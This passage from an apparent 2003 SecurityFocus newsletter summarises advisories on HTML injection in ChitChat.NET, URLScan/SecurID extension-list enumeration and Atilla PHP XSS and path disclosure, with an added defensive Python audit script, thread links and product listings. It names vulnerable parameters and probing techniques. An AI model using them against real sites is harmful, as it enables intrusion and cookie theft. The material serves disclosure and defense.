vulnerabilities. Caution should be employed if installing ActiveX
controls.
7. Clickcess ChitChat.NET Message HTML Injection Vulnerability
BugTraq ID: 8417
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8417
Summary:
Clickcess ChitChat.NET is a discussion forum designed specifically for use
with SQL Server and implemented in ASP.NET. It is available for Microsoft
Windows.
A vulnerability has been reported in the software that may allow
unsanitized user input to be injected into the website. This problem is
related to the Name and Topic Title input fields, which fail to properly
filter HTML and script code. Injected HTML code may be rendered in the
web browser of a victim who views vulnerable areas of the site. This would
occur in the security context of the site hosting ChitChat.NET.
This vulnerability could be exploited to steal cookie-based credentials
from a host. Other attacks may well be possible.
8. Microsoft URLScan / RSA Security SecurID Configuration Enume...
BugTraq ID: 8419
Remote: Yes
Date Published: Aug 14 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8419
Summary:
Microsoft URLScan is an Internet Server API (ISAPI) filter that can be
configured to block a variety of HTTP methods, file extension access, and
other queries.
SecurID, a two-factor authentication mechanism developed by RSA Security,
can also be used to prevent unauthorized access to a website.
A weakness has been discovered in Microsoft URLScan and RSA Security
SecurID when used in conjunction on a web server. The problem is said to
occur due to the order in which the products are placed within the global
ISAPI filter list.
When the vulnerable configuration is in place, an attacker may be capable
of enumerating the Microsoft URLScan extension filtering list by making
repeated requests to files with differing extensions. This is due to the
web server incorrectly returning a page containing a hidden form field
whose NAME is 'referrer' and whose VALUE contains 'Rejected-By-UrlScan'.
It should be noted that if the default configuration has been changed,
the rejection string may differ.
The enumeration of this type of information could potentially aid an
attacker when launching further attacks against the target web server.
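As an added illustration (not code from the advisory or from either vendor), the following Python checks response bodies served by a web server under your own administration for the leaked hidden field described above, so a misordered filter stack can be confirmed and fixed. The markup in the sample bodies is constructed, since the report names only the field's NAME and VALUE.

```python
from html.parser import HTMLParser

# Constructed sample response bodies (hypothetical markup: the advisory
# names only the hidden field's NAME and VALUE, not the surrounding page).
LEAKED_BODY = ('<html><body><form method="post" action="/login">'
               '<input type="hidden" name="referrer" value="Rejected-By-UrlScan">'
               '</form></body></html>')
CLEAN_BODY = ('<html><body><form><input type="hidden" name="referrer" '
              'value="/index.htm"></form></body></html>')

DEFAULT_MARKER = "Rejected-By-UrlScan"  # may differ if URLScan's config was changed


class HiddenFieldCollector(HTMLParser):
    """Collects name -> value for every <input type="hidden"> in a page."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "hidden":
            self.hidden[a.get("name", "")] = a.get("value", "")


def leaks_rejection_marker(body, marker=DEFAULT_MARKER):
    """True if any hidden form field in the response carries the marker."""
    parser = HiddenFieldCollector()
    parser.feed(body)
    return any(marker in value for value in parser.hidden.values())


def audit_responses(responses, marker=DEFAULT_MARKER):
    """responses: mapping of requested path -> response body as served by
    the server under audit. Returns the sorted set of file extensions
    whose responses disclosed the URLScan rejection marker."""
    leaked = set()
    for path, body in responses.items():
        if leaks_rejection_marker(body, marker):
            leaked.add(path.rsplit(".", 1)[-1].lower() if "." in path else "")
    return sorted(leaked)


if __name__ == "__main__":
    sample = {"/a.exe": LEAKED_BODY, "/b.htm": CLEAN_BODY, "/c.bat": LEAKED_BODY}
    print(audit_responses(sample))  # ['bat', 'exe']
```

Any non-empty result means the rejection page is reaching the client through the SecurID filter and the ISAPI filter order should be corrected.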
9. Atilla PHP Content Management System Multiple Web Vulnerabil...
BugTraq ID: 8437
Remote: Yes
Date Published: Aug 18 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8437
Summary:
Atilla PHP is a PHP content management system designed for portal sites.
It is available for Unix, Linux, and Microsoft Windows platforms.
Several problems have been identified in Atilla PHP. Because of these
issues, an attacker may be able to gain access to sensitive information,
or execute code in the browsers of victims in the security context of the
vulnerable site.
Three problems have been identified in Atilla PHP.
Atilla PHP is vulnerable to a cross-site scripting issue. The index.php3
script does not properly filter input supplied to the Rubrique and article
URI variables.
Atilla PHP is also vulnerable to a script injection issue. The
user_action.php3 script does not properly filter user input, making it
possible to insert HTML and script that will be stored in a place where it
can be executed in the browsers of victims.
Finally, Atilla PHP is vulnerable to path disclosure issues in the
index.php3 script. By supplying a single quotation mark to the id, nrub,
or article variables of the index.php3 script, it is possible to gain
information about the installation path of the software.
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Patch testing (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334432
2. Patch Management Best Practices E-Seminar (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334430
3. Article Announcement: Slow Down Internet Worms With ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334407
4. MS03-033 not signed by Microsoft? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334403
5. DCOM patch + Exchange (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334251
6. Mail from MSN Messenger (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334249
7. scan of domain logon reveals unknown port (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333826
8. SecurityFocus Microsoft Newsletter # 150 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333809
9. Article Announcement: MRTG for Intrusion Detection w... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333803
10. Why the shutdown if infected with blaster? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333799
11. DNS (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333797
12. Account Lockout -- ARGH (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333763
13. Account Lockuout --ARGH (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333753
14. Detecting Blaster (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333545
15. New variant. Blast.b (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333539
16. FW: Actions for the Blaster Worm - Special Edition, ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333529
17. MS03-029 ?-Download link (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333516
18. FW: Blaster vs. Kaht2, detecting Windows root kits (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333498
19. Administrivia: Blaster (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333482
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Sophos Anti-Virus
By: Sophos
Platforms: AIX, DOS, FreeBSD, HP-UX, Linux, MacOS, Netware, OS/2, Solaris,
UNIX, VMS, Windows 3.x, Windows 95/98, Windows NT
Relevant URL: http://www.sophos.com/products/sav/
Summary:
Sophos Anti-Virus is a unique solution to the virus problem, providing
true cross-platform protection in a single, fully integrated product. The
network-centric design provides a host of benefits for the protection of
servers, workstations and portables. Sophos's ground-breaking architecture
maximises protection, while minimising performance and administrative
overheads.
2. F-Secure Policy Manager
By: F-Secure Corporation
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.f-secure.com/products/policy-man/index.shtml
Summary:
With F-Secure Policy Manager, your system administrator can manage all the
critical security applications from antivirus protection to file and
network encryption from one single console. The administrator can
automatically and remotely install, configure and update the applications.
It is possible to manage the security applications on almost any device
and across the enterprise so that even the security of mobile workers'
laptops is guaranteed. In addition to all this, the administrator can
easily monitor the network by generating extensive reports on the security
status of the network.
3. Gordano Messaging Suite
By: Gordano
Platforms: AIX, Linux, Solaris, Windows 2000, Windows NT, Windows XP
Relevant URL: http://www.gordano.com/
Summary:
Gordano's Messaging Suite provides robust and secure email, instant and
SMS messaging for small, medium and large businesses.
4. LANDesk Management Suite 7
By: LANDesk Software
Platforms: AIX, HP-UX, Linux, MacOS, Solaris, Windows 2000, Windows 95/98,
Windows NT, Windows XP
Relevant URL: http://www.landesk.com/products/ilms/
Summary:
LANDesk Management Suite 7 is a comprehensive, integrated management
solution that's easy to use, enabling proactive management of desktops,
servers and mobile devices across heterogeneous IT environments.
- Keep up with security patches and virus updates
- Efficiently install and maintain software on the desktop
- Decrease software license costs and respond to audits
- Reduce the cost of helpdesk support
- Discover and manage hardware and software assets
- Migrate many users and their profiles to new operating systems
5. McAfee ePolicy Orchestrator
By: Network Associates
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.nai.com/us/products/mcafee/antivirus/fileserver/epo.htm
Summary:
McAfee Security ePolicy Orchestrator (ePO) is the market-leading tool for
centralized policy management of malicious threat protection. ePO allows
you to maintain up-to-date protection, configure and enforce policies, and
generate detailed graphical reports on McAfee Security and third party
products, including Symantec and Dr Ahn anti-virus products.
6. Enterprise Manager
By: Sophos
Platforms: Windows 2000, Windows NT
Relevant URL: http://www.sophos.com/products/em/
Summary:
The Enterprise Manager suite is a powerful set of tools allowing fully
automated web-based installation and updating of Sophos software across a
network and even to remote users.
Network administrators are put in full control and can monitor their
network at all times. Unprotected computers or those running an
out-of-date version of Sophos Anti-Virus can be immediately and
automatically updated. In practice, a network of 1000 or more clients can
be updated from a single, central Windows machine within five minutes.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
------------------------------------
1. Password Manager XP v1.5
By: CP-Lab
Relevant URL: http://www.cp-lab.com
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Password Manager XP is a program that helps you to systematize any secret
information stored on your PC. It will be your keeper of passwords and
secrets. Protect your private data with this password management utility.
Password Manager XP allows you to create several databases for storing
your secret information. Each database has an access password and is
encrypted with several algorithms at the same time (Blowfish, 3DES,
Rijndael, Tea, Cast128, RC4, Serpent, Twofish). You can store data in
different databases under your own passwords. You can create password
databases on a shared resource and access them from multiple computers
across the network. The Install to Removable Device Wizard will help you
install Password Manager XP to removable devices such as USB flash
drives. It is easily integrated into Microsoft Internet Explorer. It helps
you to surf the Web more safely. Password Manager XP has a built-in
password generator with many adjustable functions.
2. beecrypt v3.1.0
By: Bob Deblier, bob.deblier (at) pandora (dot) be [email concealed]
Relevant URL: http://sourceforge.net/projects/beecrypt/
Platforms: Linux, Solaris, UNIX, Windows 2000, Windows 95/98, Windows NT
Summary:
BeeCrypt is an ongoing project to provide strong and fast cryptography in
the form of a toolkit usable by commercial and open source projects.
Included in the library are entropy sources, random generators, block
ciphers, hash functions, message authentication codes, multiprecision
integer routines, and public key primitives.
3. Anti-Spam SMTP Proxy v1.0.0
By: John Hanna
Relevant URL: http://assp.sourceforge.net/
Platforms: BSDI, Linux, MacOS, Os Independent, OS/2, Perl (any system
supporting perl), POSIX, Windows 2000, Windows NT
Summary:
The Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open
source platform independent SMTP Proxy server which implements whitelists
and Bayesian filtering to help stop unsolicited commercial email (UCE).
Anti-spam tools should be adaptive to new spam and customized for each
site's email patterns. This easy-to-use tool works with any mail transport
and achieves these goals while requiring no operator intervention after
the initial setup phase.
4. ngrep v1.41
By: Jordan Ritter <jpr5 (at) darkridge (dot) com [email concealed]>
Relevant URL: http://ngrep.sourceforge.net/
Platforms: AIX, Digital UNIX/Alpha, FreeBSD, IRIX, Linux, OpenBSD,
Solaris, Windows 2000, Windows 95/98, Windows NT
Summary:
ngrep strives to provide most of GNU grep's common features, applying them
to the network layer. ngrep is a pcap-aware tool that will allow you to
specify extended regular expressions to match against data payloads of
packets. It currently recognizes TCP and UDP across ethernet, ppp and slip
interfaces, and understands bpf filter logic in the same fashion as more
common packet sniffing tools like tcpdump and snoop.
5. Securepoint Firewall and VPN Server v3.1.3 P3
By: Lutz Hausmann
Relevant URL: http://www.securepoint.cc/
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT
Summary:
Securepoint Firewall and VPN Server is a high-performance application
designed to offer full protection for network assets. The Security Manager
offers a graphical user interface with many features, different
configurations, and advanced reporting functions. The Securepoint server
is a complete firewall and VPN software system with an operating system
based on a secure Linux. VPN operation supports PPTP and IPSec (X.509
certificates, preshared, RSA signature). You can use the firewall on a
standard PC with 2 to 16 network cards (including Ethernet, ADSL, ISDN).
It is very easy to install and administer. The Securepoint Security
Manager is available in English, German, and Spanish, and works in online
and offline mode.
6. libdvdcss v1.2.8
By: Samuel Hocevar <sam (at) zoy (dot) org [email concealed]>
Relevant URL: http://www.videolan.org/libdvdcss/
Platforms: BeOS, FreeBSD, Linux, OpenBSD, Windows 2000, Windows 95/98,
Windows NT
Summary:
libdvdcss is a cross-platform library for transparent DVD device access
with on the fly CSS decryption. It currently runs under Linux, FreeBSD,
NetBSD, OpenBSD, BSD/OS, Solaris, BeOS, Win98, Win2k and MacOS X. It is
used for the vlc DVD player because of its portability and because, unlike
similar libraries, it does not require your DVD drive to be region-locked.
VI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: KaVaDo
http://www.securityfocus.com/sponsor/KaVaDo_ms-secnews_030825